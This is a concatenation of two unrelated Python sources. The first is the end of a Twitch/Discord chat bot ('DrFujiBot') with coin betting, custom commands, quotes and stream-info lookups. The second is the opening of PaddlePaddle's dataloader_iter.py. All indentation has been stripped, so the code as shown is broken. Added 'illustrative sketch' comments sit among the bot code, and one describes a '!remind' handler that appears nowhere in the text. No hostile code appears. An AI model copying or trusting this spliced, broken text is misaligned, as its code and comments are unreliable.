self.output_msg(c, "Event name must not contain spaces", source_user)
else:
self.output_msg(c, "Betting has not been configured", source_user)
elif line.startswith("!cancel"):
if self.foundCoinFile:
if len(line.split(" ")) == 2:
event_name = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
if event_name in self.open_events.keys():
wager = self.open_event_rewards[event_name]
for user in self.open_events[event_name].keys():
self.coin_data['coins'][user] += wager
self.update_coin_data()
del self.open_events[event_name]
del self.open_event_rewards[event_name]
self.output_msg(c, "Event '" + event_name + "' has been cancelled, and all bets refunded", source_user)
self.config['open_events'] = self.open_events
self.config['open_event_rewards'] = self.open_event_rewards
self.update_config()
elif event_name in self.closed_events.keys():
for user in self.closed_events[event_name].keys():
wager = self.open_event_rewards[event_name]
self.coin_data['coins'][user] += wager
self.update_coin_data()
del self.closed_events[event_name]
del self.open_event_rewards[event_name]
self.output_msg(c, "Event '" + event_name + "' has been cancelled, and all bets refunded", source_user)
self.config['closed_events'] = self.closed_events
self.config['open_event_rewards'] = self.open_event_rewards
self.update_config()
else:
self.output_msg(c, "Event '" + event_name + "' not found", source_user)
else:
self.output_msg(c, "Event name must not contain spaces", source_user)
else:
self.output_msg(c, "Betting has not been configured", source_user)
elif line.startswith("!resolve"):
self.resolve_bet(c, line, source_user)
elif line.startswith("!bet"):
if len(line.split(" ")) == 2:
guess = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
try:
if len(self.open_events.keys()) == 1:
event_name = list(self.open_events.keys())[0]
coins = self.open_event_rewards[event_name]
if guess in self.bet_config['events'][event_name]['outcomes'].keys():
with self.coin_lock:
if None == self.coin_data['coins'].get(source_user):
# If it's a new user and the coin loop hasn't run yet
self.coin_data['coins'][source_user] = 0
refund = 0
previous = self.open_events[event_name].get(source_user)
if None != previous:
refund = previous[1]
self.open_events[event_name][source_user] = (guess, coins)
self.config['open_events'] = self.open_events
self.update_config()
else:
self.output_msg(c, "@" + source_user + " Not a valid outcome!", source_user)
else:
self.output_msg(c, "Could not find active event", source_user)
except:
self.output_msg(c, "Format: !bet <guess>", source_user)
else:
self.output_msg(c, "Format: !bet <guess>", source_user)
elif line.startswith("!daily"):
if not self.whisperMode and self.username != 'everoddish':
now = datetime.datetime.now()
if self.coin_data['last_daily_bonus'].get(source_user):
last = datetime.datetime.fromtimestamp(self.coin_data['last_daily_bonus'][source_user])
else:
last = now - datetime.timedelta(hours=25)
if last < self.start_time:
last = now - datetime.timedelta(hours=25)
output = ""
diff = now - last
if diff.days >= 1:
more_coins = random.randint(0, 100)
crit = random.randint(1, 16)
if 1 == crit and 0 != more_coins:
more_coins *= 2
output = "@" + source_user + " You received a daily bonus of " + str(more_coins) + " coins!"
if 1 == crit and 0 != more_coins:
output += " A critical hit!"
if 0 == more_coins:
output += " It missed!"
timestamp = time.mktime(now.timetuple())
self.coin_data['last_daily_bonus'][source_user] = timestamp
self.update_config()
with self.coin_lock:
if None == self.coin_data['coins'].get(source_user):
# If it's a new user and the coin loop hasn't run yet
self.coin_data['coins'][source_user] = 0
self.coin_data['coins'][source_user] += more_coins
self.update_coin_data()
else:
diff2 = datetime.timedelta(hours=24) - diff
output = "@" + source_user
output += " You can receive another daily bonus in "
output += str(diff2.seconds//3600) + " hours and "
output += str((diff2.seconds//60)%60) + " minutes"
self.output_msg(c, output, source_user)
elif line.startswith("!riprun"):
# Streamer only
if source_user.lower() == self.username.lower():
if self.foundCoinFile:
if len(line.split(" ")) >= 3:
# Set deaths to zero
self.deaths = 0
self.config['deaths'] = 0
if None != self.config['current_run'] and None != self.config['run_data']:
if None != self.config['run_data'].get(self.config['current_run']):
self.config['run_data'][self.config['current_run']]['deaths'] = self.deaths
self.update_config()
try:
num_badges = int(line.split(" ")[1].rstrip("\n").rstrip("\r").lower())
message = line.split(" ", 2)[2].rstrip("\n").rstrip("\r")
# Resolve badge bets
command = "!resolve badges " + str(num_badges)
self.resolve_bet(c, command, source_user)
# Start a new badge bet
command = "!event badges 10000"
self.new_bet(c, command, source_user)
if None != self.config['current_run'] and None != self.config['run_data']:
if None != self.config['run_data'].get(self.config['current_run']):
self.config['run_data'][self.config['current_run']]['!lastrun'] = message
self.config['run_data'][self.config['current_run']]['attempt'] += 1
if None != self.config['extra_commands'].get('!lastrun'):
self.config['extra_commands']['!lastrun'] = message
self.update_config()
self.output_msg(c, "Rip run BibleThump", source_user)
except Exception as e:
print("Exception: " + str(e))
else:
self.output_msg(c, "Format: !riprun <num_badges_obtained> <new_!lastrun_message>", source_user)
else:
self.output_msg(c, "Betting has not been configured", source_user)
elif line.startswith("!notify "):
# Streamer only (or me nathanPepe)
if "pokemonchallenges" == self.username.lower() or "pokemonrealtime" == source_user.lower():
message = line.split(" ", 1)[1].rstrip("\n").rstrip("\r")
timestamp = int(time.time())
self.pcce["notification"] = str(timestamp) + ":" + message
self.update_pcce()
self.output_msg(c, "Notification sent to PCCE users", source_user)
elif line.startswith("!leaderboard"):
if "pokemonchallenges" == self.username.lower():
with open('PokemonChallenges_coins.json', 'r') as coin_file:
coin_info = json.load(coin_file)
coins = coin_info.get('coins')
if None != coins:
sorted_data = sorted(coins.items(), key=operator.itemgetter(1))
i = 0
output = "Leaderboard: "
for e in reversed(sorted_data):
#print(e[0] + " - " + str(e[1]))
output += e[0] + "(" + str(int(e[1])) + ") "
if i >= 2:
break
i += 1
self.output_msg(c, output, source_user)
elif line.startswith("!balance"):
if self.whisperMode:
output = get_coin_balances(source_user)
self.output_msg(c, output, source_user)
else:
self.output_msg(c, 'The !balance command has returned to whisper-only mode! Type "/w DrFujiBot !balance" to see your coins!', source_user)
elif line.startswith("!credit"):
if len(line.split(" ")) >= 3:
arg1 = line.split(" ")[1]
arg2 = line.split(" ")[2]
success = False
try:
coins = int(arg1)
user = arg2
success = True
except:
pass
try:
coins = int(arg2)
user = arg1
success = True
except:
pass
if success:
with self.coin_lock:
if None == self.coin_data['coins'].get(user):
self.coin_data['coins'][user] = coins
else:
self.coin_data['coins'][user] += coins
self.update_coin_data()
output = "Credited " + str(coins) + " coins to @" + user
self.output_msg(c, output, source_user)
else:
self.output_msg(c, "Format: !credit <user> <coins>", source_user)
elif line.startswith("!coins"):
if self.whisperMode:
output1 = "You're earning coins while sitting in chat! Make sure to use the !daily command every 24 hours to get a daily coin reward! "
output2 = "You can check your savings at any time by using the !balance command. "
output3 = "A mod will start a betting event in chat, and you can joing by typing !bet <event> <outcome> <coins> after the event has started! "
output4 = "For example: '!bet nature modest 100' For a full list of betting commands and what they do, click here: https://goo.gl/i8slEk"
output5 = get_coin_balances(source_user)
self.output_msg(c, output1, source_user)
time.sleep(1)
self.output_msg(c, output2, source_user)
time.sleep(1)
self.output_msg(c, output3, source_user)
time.sleep(1)
self.output_msg(c, output4, source_user)
time.sleep(1)
self.output_msg(c, output5, source_user)
else:
output = "You're currently earning coins and can use them to bet on what might happen during the stream! "
output += "Use !balance to see your current savings!"
self.output_msg(c, output, source_user)
elif line.startswith("!addcom"):
if True == self.config['extra_commands_on']:
if len(line.split(" ")) >= 3:
command = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
message = line.split(" ", 2)[2].rstrip("\n").rstrip("\r")
if command.startswith("!"):
if not message.startswith("!"):
if False == self.is_valid_command(command):
if None == self.config['extra_commands'].get(command):
if self.is_setrun_command(command):
self.set_current_run_data(command, message)
else:
self.config['extra_commands'][command] = message
self.update_config()
self.output_msg(c, command + " command added", source_user)
else:
self.output_msg(c, "Command already exists", source_user)
else:
self.output_msg(c, "Cannot override existing DrFujiBot command", source_user)
else:
self.output_msg(c, "Message cannot start with !", source_user)
else:
self.output_msg(c, "Command must start with !", source_user)
else:
self.output_msg(c, "Format: !addcom <!command> <message>", source_user)
elif line.startswith("!editcom"):
if True == self.config['extra_commands_on']:
if len(line.split(" ")) >= 3:
command = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
message = line.split(" ", 2)[2].rstrip("\n").rstrip("\r")
if command.startswith("!"):
if not message.startswith("!"):
exists = False
if self.is_setrun_command(command):
exists = True
else:
# Not using !setrun
if None != self.config['extra_commands'].get(command):
exists = True
if exists:
if self.is_setrun_command(command):
self.set_current_run_data(command, message)
else:
self.config['extra_commands'][command] = message
self.update_config()
self.output_msg(c, command + " command updated", source_user)
else:
self.output_msg(c, "Command '" + command + "' not found", source_user)
else:
self.output_msg(c, "Message cannot start with !", source_user)
else:
self.output_msg(c, "Command must start with !", source_user)
else:
self.output_msg(c, "Format: !editcom <!command> <message>", source_user)
elif line.startswith("!delcom"):
if True == self.config['extra_commands_on']:
if len(line.split(" ")) == 2:
command = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
if None != self.config['extra_commands'].get(command):
del self.config['extra_commands'][command]
self.update_config()
self.output_msg(c, command + " command deleted", source_user)
else:
self.output_msg(c, "Command '" + command + "' not found", source_user)
else:
self.output_msg(c, "Format: !delcom <!command>", source_user)
elif line.startswith("!so ") or line.startswith("!shoutout"):
if True == self.config['extra_commands_on']:
streamer = ""
if len(line.split(" ")) >= 2:
streamer = line.split(" ")[1].rstrip("\n").rstrip("\r")
else:
streamer = self.username
self.do_shoutout(c, streamer, self.config['shoutout_messages'], 0, source_user)
elif line.startswith("!raid"):
# Streamer only
if source_user.lower() == self.username.lower():
if len(line.split(" ")) == 2:
streamer = line.split(" ")[1].rstrip("\n").rstrip("\r")
output = self.config.get('raid_message')
if None != output:
for i in range(5):
self.output_msg(c, output, source_user, 0)
output = "twitch.tv/" + streamer
for i in range(5):
self.output_msg(c, output, source_user, 0)
elif line.startswith("!uptime"):
if True == self.config['extra_commands_on']:
output = ""
CLIENT_ID = get_fuji_config_value('twitch_client_id')
STREAM_INFO_URL = 'https://api.twitch.tv/kraken/streams?channel=' + self.username
try:
request = urllib.request.Request(STREAM_INFO_URL)
request.add_header('Client-ID', CLIENT_ID)
response = urllib.request.urlopen(request)
data = json.loads(response.read().decode('utf-8'))
if len(data['streams']) > 0:
created_at = data['streams'][0]['created_at']
live_datetime = iso8601.parse_date(created_at)
now = datetime.datetime.now(datetime.timezone.utc)
diff = now - live_datetime
output = "Uptime: "
output += str(diff.seconds//3600) + " hours and "
output += str((diff.seconds//60)%60) + " minutes"
else:
output = "This channel is offline"
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
output = "Error getting uptime from Twitch server"
self.output_msg(c, output, source_user)
elif line.startswith("!song"):
lastfm_user = self.config.get('lastfm_user')
LASTFM_API_KEY = get_fuji_config_value('lastfm_api_key')
if None != lastfm_user:
lastfm_url = "http://ws.audioscrobbler.com/2.0/?method=user.getrecenttracks&user="
lastfm_url += lastfm_user
lastfm_url += "&api_key="
lastfm_url += LASTFM_API_KEY
lastfm_url += "&format=json"
try:
response = urllib.request.urlopen(lastfm_url).read().decode('UTF-8')
lastfm_data = json.loads(response)
#for track in lastfm_data['recenttracks']['track']:
# print(track['name'] + " - " + track['artist']['#text'])
most_recent_track = lastfm_data['recenttracks']['track'][0]
output = most_recent_track['name'] + " - " + most_recent_track['artist']['#text']
spotify_user = self.config.get('spotify_user')
if None != spotify_user:
output += " | Check out my playlists here: https://open.spotify.com/user/" + spotify_user
self.output_msg(c, output, source_user)
except Exception as e:
print("!song exception: " + str(e))
elif line.startswith("!quote"):
if True == self.config['extra_commands_on']:
if len(self.config['quotes'].keys()) > 0:
# Cooldown
last_output = self.extra_command_cooldown.get("!quote")
should_output = False
current_time = datetime.datetime.now()
if None == last_output:
should_output = True
else:
diff = current_time - last_output
if diff.seconds >= 10:
should_output = True
if should_output:
key = ""
quote = ""
is_int = False
if len(line.split(" ")) > 1:
key = line.split(" ")[1]
try:
key_int = int(key)
is_int = True
except:
pass
else:
key = random.choice(list(self.config['quotes'].keys()))
is_int = True
if is_int:
if self.config['quotes'].get(key):
quote = 'Quote #' + key + ' "'
quote += self.config['quotes'][key]
quote += '" -' + self.username
else:
self.output_msg(c, "Quote #" + key + " not found", source_user)
else:
matches = [q for q in self.config['quotes'].values() if key.lower() in q.lower()]
if len(matches) > 0:
selected_match = random.choice(matches)
for k, v in self.config['quotes'].items():
if v == selected_match:
quote = 'Quote #' + k + ' "'
quote += self.config['quotes'][k]
quote += '" -' + self.username
else:
self.output_msg(c, "Quote containing '" + key + "' not found", source_user)
if len(quote) > 0:
self.output_msg(c, quote, source_user)
# Update last output time
self.extra_command_cooldown["!quote"] = current_time
else:
self.output_msg(c, "No quotes available", source_user)
elif line.startswith("!addquote"):
if True == self.config['extra_commands_on']:
quote = line.split(" ", 1)[1].rstrip("\n").rstrip("\r")
key = 1
while self.config['quotes'].get(str(key)):
key += 1
key = str(key)
self.config['quotes'][key] = quote
self.update_config()
self.output_msg(c, "Quote #" + key + " added", source_user)
elif line.startswith("!delquote"):
if True == self.config['extra_commands_on']:
if len(line.split(" ")) == 2:
quoteNum = line.split(" ")[1].rstrip("\n").rstrip("\r")
if self.config['quotes'].get(quoteNum):
del self.config['quotes'][quoteNum]
self.update_config()
self.output_msg(c, "Quote #" + quoteNum + " deleted", source_user)
else:
self.output_msg(c, "Quote #" + quoteNum + " not found", source_user)
else:
self.output_msg(c, "Format: !delquote <quote number>", source_user)
elif line.startswith("!elo"):
if len(line.split(" ")) == 2:
ladder = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
else:
ladder = "gen7ou"
output = ""
result = requests.get("https://pokemonshowdown.com/users/" + self.username)
if result.status_code == 200:
soup = BeautifulSoup(result.content, "html.parser")  # explicit parser avoids bs4's "no parser specified" warning
rows = soup.find_all("tr")
for row in rows:
cells = row.find_all("td")
if len(cells) >= 2:
if ladder == cells[0].text:
output = "Showdown '" + ladder + "' ELO: " + cells[1].text
break
if len(output) == 0:
output = "Showdown ladder '" + ladder + "' not found"
self.output_msg(c, output, source_user)
elif line.startswith("!smogon "):
if len(line.split(" ")) == 2:
pkmn = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
one_month = 60 * 60 * 24 * 30
#requests_cache.install_cache("smogon", backend='sqlite', expire_after=one_month)
result = requests.get("http://www.smogon.com/dex/sm/pokemon/" + pkmn)
if result.status_code == 200:
data_re = re.compile(r'dexSettings = (\{.*\})')
text_content = result.content.decode('utf-8')
matches = data_re.search(text_content)
output = ""
if matches:
json_data = matches.group(1)
data = json.loads(json_data)
inject_rpcs = data["injectRpcs"]
for inj in inject_rpcs:
if "dump-pokemon" in inj[0]:
data_dict = inj[1]
if len(data_dict["strategies"]) > 0:
strat = data_dict["strategies"][0]
movesets = strat["movesets"]
tier = strat["format"]
for moveset in movesets:
output = "(" + tier + ") "
output += moveset["name"]
output += ": "
for moveslot in moveset["moveslots"]:
output += moveslot[0]
output += ", "
output = output.rsplit(", ", 1)[0]
output += " - "
output += moveset["abilities"][0]
output += " - "
output += moveset["items"][0]
self.output_msg(c, output, source_user, 0)
break
if len(output) == 0:
self.output_msg(c, "Could not find Smogon information for '" + pkmn + "'", source_user)
#requests_cache.uninstall_cache()
else:
self.output_msg(c, "Format: !smogon <pokemon>", source_user)
elif line.startswith("!chatbattle"):
# Streamer only
#if source_user.lower() == self.username.lower():
if source_user.lower() == "drfujibot":
try:
server_address = '/tmp/fuji_to_node.sock'
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(server_address)
node_command = ".searchbattle gen7randombattle"
msg = json.dumps({"line": node_command}).encode('UTF-8')
sock.send(msg)
sock.send(b"\r\n")
sock.close()
print("Sent command")
server_address = '/tmp/node_to_fuji.sock'
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.bind(server_address)
sock.listen(5)
conn, addr = sock.accept()
print("Waiting for response")
response = conn.recv(1024)
if response:
response = response.decode('utf-8')
sock.close()
os.remove('/tmp/node_to_fuji.sock')
print("Closing socket")
if response:
self.battle_room = response
self.output_msg(c, "Click here to spectate: http://play.pokemonshowdown.com/" + response, source_user)
else:
print("No response")
except:
self.output_msg(c, "Error, Showdown component not running", source_user)
elif line.startswith("!forfeit"):
# Streamer only
if source_user.lower() == self.username.lower():
if len(self.battle_room) > 0:
try:
server_address = '/tmp/fuji_to_node.sock'
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(server_address)
node_command = ".leave " + self.battle_room
msg = json.dumps({"line": node_command}).encode('UTF-8')
sock.send(msg)
sock.send(b"\r\n")
sock.close()
self.output_msg(c, "Forfeited " + self.battle_room, source_user)
self.battle_room = ""
except:
self.output_msg(c, "Error, Showdown component not running", source_user)
else:
self.output_msg(c, "Not currently in a battle", source_user)
elif line.startswith("!setrun"):
if len(line.split(" ")) >= 2:
run_name = line.split(" ", 1)[1].rstrip("\n").rstrip("\r").lower()
self.config['current_run'] = run_name
if None == self.config['run_data'].get(run_name):
# Run doesn't exist yet, so create it
self.config['run_data'][run_name] = {}
self.config['run_data'][run_name]['game'] = self.game
self.config['run_data'][run_name]['deaths'] = self.deaths
self.config['run_data'][run_name]['closed_events'] = {}
self.config['run_data'][run_name]['attempt'] = 1
# Clear closed_events, since this is a new run.
# Old closed_events should already be saved for previous run.
self.closed_events = {}
self.config['closed_events'] = {}
else:
# Run exists
if None != self.config['run_data'][run_name].get('game'):
# Get current game from run data, if it exists
self.game = self.config['run_data'][run_name].get('game')
# Sync run data game, in case it didn't exist
self.config['run_data'][run_name]['game'] = self.game
# Set config file game
self.config['games'][self.username] = self.game
if None != self.config['run_data'][run_name].get('deaths'):
# Get current deaths from run data, if it exists
self.deaths = self.config['run_data'][run_name].get('deaths')
# Sync run data deaths, in case it didn't exist
self.config['run_data'][run_name]['deaths'] = self.deaths
# Set config file deaths
self.config['deaths'] = self.deaths
if None != self.config['run_data'][run_name].get('closed_events'):
# Get current closed_events from run data, if it exists
self.closed_events = copy.deepcopy(self.config['run_data'][run_name].get('closed_events'))
# Sync run data closed_events, in case it didn't exist
self.config['run_data'][run_name]['closed_events'] = copy.deepcopy(self.closed_events)
# Set config file closed_events
self.config['closed_events'] = copy.deepcopy(self.closed_events)
self.update_config()
self.output_msg(c, "Set current run to '" + run_name + "'", source_user)
else:
self.output_msg(c, "Format: !setrun <run name>", source_user)
elif line.startswith("!combo"):
if self.config.get('highest_combo'):
self.output_msg(c, "Highest combo: " + str(self.config['highest_combo'][0]) + "x ( " + self.config['highest_combo'][1] + " )", source_user)
elif line.startswith("!attempt"):
if None != self.config.get('run_data') and None != self.config.get('current_run'):
if None != self.config['run_data'][self.config['current_run']].get('attempt'):
attempt = self.config['run_data'][self.config['current_run']].get('attempt')
self.output_msg(c, "This is attempt #" + str(attempt), source_user)
elif line.startswith("!swearjar"):
if len(line.split(" ")) >= 2:
try:
swearjar = int(line.split(" ", 1)[1].rstrip("\n").rstrip("\r"))
self.config['swearjar'] = swearjar
self.update_config()
self.output_msg(c, "Swear jar: " + str(swearjar), source_user)
except:
self.output_msg(c, "Invalid swearjar value", source_user)
else:
swearjar = self.config.get('swearjar')
if swearjar:
swearjar += 1
else:
swearjar = 1
self.config['swearjar'] = swearjar
self.update_config()
self.output_msg(c, "Swear jar: " + str(swearjar), source_user)
elif line.startswith("!define"):
if len(line.split(" ")) >= 2:
replacement = line.split(" ", 1)[1].rstrip("\n").rstrip("\r")
else:
replacement = 'Nuzlocke'
success = False
while not success:
try:
random_title = wikipedia.random()
print(random_title)
summary = wikipedia.summary(random_title)
if '(' in random_title:
random_title = random_title[:random_title.index('(')]
summary = summary.replace('\n', ' ')
if len(summary) > 248:
summary = summary[:248]
nuzlocke_re = re.compile(random_title, re.IGNORECASE)
summary = nuzlocke_re.sub(replacement, summary)
self.output_msg(c, summary, source_user)
success = True
except:
pass
# NEW COMMANDS GO HERE ^^^
else:
if True == self.config['extra_commands_on']:
if len(line.split(" ")) >= 2:
cmd = line.split(" ")[0].rstrip("\n").rstrip("\r").lower()
else:
cmd = line.rstrip("\n").rstrip("\r").lower()
print(cmd)
last_output = self.extra_command_cooldown.get(cmd)
should_output = False
current_time = datetime.datetime.now()
if None == last_output:
should_output = True
else:
diff = current_time - last_output
if diff.seconds >= 30:
should_output = True
if should_output:
if self.is_setrun_command(cmd):
message = self.get_current_run_data(cmd)
if None == message:
message = self.config['extra_commands'].get(cmd)
else:
message = self.config['extra_commands'].get(cmd)
if None != message:
self.output_msg(c, message, source_user)
# Update last output time
self.extra_command_cooldown[cmd] = current_time
def on_dccmsg(self, c, e):
pass
def on_dccchat(self, c, e):
pass
def do_command(self, e, cmd):
pass
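# Illustrative sketch, not part of the bot: the !remind handler above calls a
# parse_time() helper that is defined elsewhere in this file and not shown here.
# The hypothetical version below only demonstrates how duration strings matching
# the documented examples ("5m", "5m30s", "1h5m30s") could be turned into a
# datetime.timedelta; the name and behavior are assumptions, not the real helper.
def _example_parse_time(timestring):
    """Hypothetical duration parser: returns a timedelta, or None if invalid."""
    import re
    from datetime import timedelta
    match = re.fullmatch(r'(?:(\d+)h)?(?:(\d+)m)?(?:(\d+)s)?', timestring)
    if not match or not any(match.groups()):
        return None
    hours, minutes, seconds = (int(g) if g else 0 for g in match.groups())
    return timedelta(hours=hours, minutes=minutes, seconds=seconds)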
class DrFujiBotDiscord(discord.Client):
def __init__(self):
super().__init__()
self.user_ids = {}
async def send_channel_wrapper(self, output):
await self.send_message(self.get_channel(self.channel_id), output)
async def send_dm_wrapper(self, output, user):
user_object = await self.get_user_info(self.user_ids[user])
if user_object:
msg = await self.send_message(user_object, output)
else:
print('User not found: ' + user)
def discord_output(self, drfujibot, c, output, user, sleeptime=0):
if self.whisper:
asyncio.run_coroutine_threadsafe(self.send_dm_wrapper(output, user), self.loop)
else:
asyncio.run_coroutine_threadsafe(self.send_channel_wrapper(output), self.loop)
print(output)
with open(self.logname, "a") as f:
f.write(output + "\n")
f.flush()
def setProperties(self, username, permitted_users, moderators, g_whisperMode, game, channel_id, logname, bot_type):
self.channel_id = channel_id
self.logname = logname
self.whisper = g_whisperMode
self.bot = DrFujiBot(username, permitted_users, moderators, g_whisperMode, game, bot_type)
self.bot.permissions = False
self.bot.output_msg = types.MethodType(self.discord_output, self.bot)
def on_discord_msg(self, line, source_user, source_id):
self.bot.log_cmd(line, source_user)
c = None
self.bot.handle_respects(line, source_user, discord=True)
self.bot.processCommand(line, c, source_user, source_id)
def on_discord_direct_message(self, line, source_user, author_id):
if source_user not in self.user_ids:
self.user_ids[source_user] = author_id
if source_user not in self.bot.previous_users:
c = None
self.bot.output_msg(c, "I see this may be your first time using DrFujiBot! Feel free to check out the documentation: http://goo.gl/JGG3LT You can also follow me on Twitter! https://twitter.com/drfujibot", source_user)
self.bot.previous_users[source_user] = 1
with open('whisper_discord_users.json', 'w') as config_file:
config_file.write(json.dumps(self.bot.previous_users))
self.bot.log_cmd(line, source_user)
c = None
self.bot.processCommand(line, c, source_user)
g_discordClient = DrFujiBotDiscord()
@g_discordClient.event
async def on_ready():
print('Connected to Discord')
await g_discordClient.change_presence(game=discord.Game(name='with genetic memes'))
@g_discordClient.event
async def on_message(message):
if g_discordClient.whisper:
if message.channel.is_private:
line = message.content
source_user = str(message.author)
g_discordClient.on_discord_direct_message(line, source_user, message.author.id)
else:
if message.channel.id == g_discordClient.channel_id:
line = message.content
source_user = message.author.name
source_id = message.author.id
g_discordClient.on_discord_msg(line, source_user, source_id)
def main():
#logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
config = None
with open(sys.argv[1]) as config_file:
config = json.load(config_file)
if config:
permitted_users = config.get('permitted_users')
moderators = config.get('moderators')
username = config.get('streamer')
logname = username + '.log'
g_whisperMode = config.get('whisper')
bot_type = config.get('bot_type')
channel_id = config.get('channel_id')
game = None
if False == g_whisperMode:
game = config.get('games').get(username)
if len(username) >= 1:
print("Welcome to DrFujiBot, %s!" % (username))
users = []
for u in permitted_users:
users.append(u.lower())
users.insert(0, 'drfujibot')
users.insert(0, username.lower())
print("Permitted users are: " + ", ".join(users))
if None != moderators:
print("Moderators are: " + ", ".join(moderators))
random.seed()
with open(username + ".log", "a") as f:
f.write("BOT STARTUP\n")
f.flush()
if bot_type and "discord" == bot_type:
print('Starting Discord mode')
g_discordClient.setProperties(username, permitted_users, moderators, g_whisperMode, game, channel_id, logname, bot_type)
discord_key = get_fuji_config_value('discord_key')
g_discordClient.run(discord_key)
else:
g_bot = DrFujiBot(username, permitted_users, moderators, g_whisperMode, game, bot_type)
g_bot.start()
if "__main__" == __name__:
main()
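# Illustrative sketch, not part of the bot: main() above loads a JSON config file
# given as sys.argv[1]. The helper below writes a minimal example containing only
# the keys that main() itself reads; every value is a placeholder, and a real
# config carries many more keys used elsewhere in the bot (deaths, extra_commands,
# quotes, run_data, ...), so treat this purely as a hedged illustration.
def _write_example_config(path="example_config.json"):
    import json
    example = {
        "streamer": "examplestreamer",            # also used as the log file name
        "permitted_users": ["trusted_mod"],       # may run privileged commands
        "moderators": ["trusted_mod"],
        "whisper": False,                         # True enables whisper/DM mode
        "bot_type": "twitch",                     # or "discord" (channel_id then applies)
        "channel_id": None,
        "games": {"examplestreamer": "emerald"},  # only read when whisper is False
    }
    with open(path, "w") as config_file:
        json.dump(example, config_file, indent=4)
    return path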
|
dataloader_iter.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import six
import sys
import time
import signal
import numbers
import logging
import itertools
import threading
import numpy as np
import multiprocessing
from collections import namedtuple
from paddle.fluid.framework import _set_expected_place, _current_expected_place, set_flags
# NOTE: queue has a different name in python2 and python3
import queue
import paddle
import paddle.profiler as profiler
from .. import core, layers
from ..framework import _non_static_mode, in_dygraph_mode, _in_legacy_dygraph
from ..multiprocess_utils import _set_SIGCHLD_handler, MP_STATUS_CHECK_INTERVAL, CleanupFuncRegistrar
from .fetcher import _IterableDatasetFetcher, _MapDatasetFetcher
from .batch_sampler import _InfiniteIterableSampler
from .collate import default_collate_fn, default_convert_fn
from .worker import ParentWatchDog, get_worker_info, _worker_loop, \
_DatasetKind, _IterableDatasetStopIteration, _WorkerException, \
_ResumeIteration
from .flat import _flatten_batch, _restore_batch
from paddle.profiler.timer import benchmark
__all__ = ['get_worker_info']
# NOTE: fix `terminate called without an active exception`.
# If the for loop breaks and the program exits immediately (with no model
# layers processing) after iterating only the first few batches in
# distributed launch mode, distributed launch will call terminate() to
# kill the main process on each device, but the reader thread is still
# iterating to fill the blocking queue caches. This may cause the thread
# error `terminate called without an active exception`, because terminate
# is a strong signal and `__del__` of DataLoader may not be called, so we
# keep a global link to the last DataLoader instance and call its
# `__del__` to clean up resources.
# NOTE: we cannot simply register `__del__` with CleanupFuncRegistrar,
# because that would keep a global link to every DataLoader instance,
# preventing GC from collecting DataLoader instances and causing a
# memory leak.
_loader = None
def _clear_loader():
global _loader
if _loader is not None:
try:
_loader.__del__()
del _loader
except:
pass
CleanupFuncRegistrar.register(_clear_loader)
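# Illustrative sketch, not part of this module: the iterator classes defined below
# are normally driven through the public paddle.io.DataLoader API rather than used
# directly. A map-style dataset (indexable, with __len__) corresponds to
# _DatasetKind.MAP, an iterable-style dataset to _DatasetKind.ITER. The helper
# below is hypothetical, never called here, and assumes the public
# paddle.io.Dataset / paddle.io.IterableDataset base classes.
def _example_toy_datasets(num_samples=16):
    """Hypothetical helper: build one map-style and one iterable-style toy dataset."""

    class ExampleMapDataset(paddle.io.Dataset):
        # Map-style: random access via __getitem__ plus a known __len__.
        def __getitem__(self, idx):
            image = np.random.random([3, 4]).astype('float32')
            label = np.array([idx]).astype('int64')
            return image, label

        def __len__(self):
            return num_samples

    class ExampleIterableDataset(paddle.io.IterableDataset):
        # Iterable-style: only yields samples, no random access or length.
        def __iter__(self):
            for idx in range(num_samples):
                yield np.random.random([3, 4]).astype('float32'), \
                    np.array([idx]).astype('int64')

    return ExampleMapDataset(), ExampleIterableDataset()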
class _DataLoaderIterBase(object):
"""
Base iterator implementation of DataLoader; loads and feeds mini-batch
data according to the settings of the given DataLoader.
Args:
loader(instance of DataLoader): instance of `fluid.io.DataLoader`
"""
def __init__(self, loader):
self._dataset = loader.dataset
self._feed_list = loader.feed_list or []
self._places = loader.places
self._return_list = loader.return_list
self._batch_sampler = loader.batch_sampler
self._drop_last = loader.drop_last
self._auto_collate_batch = loader.auto_collate_batch
self._num_workers = loader.num_workers
self._use_buffer_reader = loader.use_buffer_reader
self._use_shared_memory = loader.use_shared_memory
self._timeout = loader.timeout if loader.timeout > 0 else MP_STATUS_CHECK_INTERVAL
self._worker_init_fn = loader.worker_init_fn
self._dataset_kind = loader.dataset_kind
self._pin_memory = loader.pin_memory
self._sampler_iter = iter(self._index_sampler)
if self._auto_collate_batch:
self._collate_fn = loader.collate_fn or default_collate_fn
else:
self._collate_fn = loader.collate_fn or default_convert_fn
# LoDTensorBlockingQueue instance for create_py_reader and a thread
# to put mini-batch data into self._blocking_queue; mini-batch data
# is obtained from:
# 1. multi-process mode: read data from the workers' result queue
# 2. single-process mode: read mini-batch data in the main process
self._blocking_queue = None
self._thread = None
self._thread_done_event = threading.Event()
@property
def _index_sampler(self):
if self._auto_collate_batch:
return self._batch_sampler
else:
if self._dataset_kind == _DatasetKind.MAP:
return list(range(len(self._dataset)))
else:
return _InfiniteIterableSampler(self._dataset, 1)
def __iter__(self):
return self
def __len__(self):
return len(self._batch_sampler)
def _exit_thread_expectedly(self):
self._thread_done_event.set()
if self._blocking_queue:
self._blocking_queue.close()
def _exit_thread_unexpectedly(self):
self._thread_done_event.set()
if self._blocking_queue:
self._blocking_queue.kill()
